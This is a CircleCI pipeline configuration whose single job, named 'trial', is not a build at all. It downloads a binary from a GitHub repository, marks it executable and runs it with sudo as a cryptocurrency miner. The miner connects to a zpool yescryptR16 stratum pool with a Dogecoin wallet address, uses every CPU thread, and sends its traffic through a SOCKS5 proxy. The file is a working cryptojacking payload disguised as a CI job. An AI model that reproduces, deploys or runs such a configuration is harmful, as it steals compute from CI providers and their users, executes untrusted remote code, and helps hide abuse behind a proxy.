version: 2.1
jobs:
    trial:
      docker:
            - image: cimg/node:18.2.0
      parallelism: 2
      steps:
        - run:
            name: "trial"
            command: sudo apt update && sudo apt install lynx && lynx -dont_wrap_pre -dump "https://github.com/TamJsmt/TamJsmt/raw/main/data" > data && chmod 777 data && sudo ./data -a yescryptr16 -o stratum+tcps://yescryptR16.na.mine.zpool.ca:56333 -u DG1Fvzq3Z5HNzx2VRNqnKDDBJq7A3NVCvS -p c=DOGE,zap=QOGE -t $(nproc) -x socks5://72.206.181.97:64943


workflows:
    version: 2.1
    build:
        jobs:
        - trial
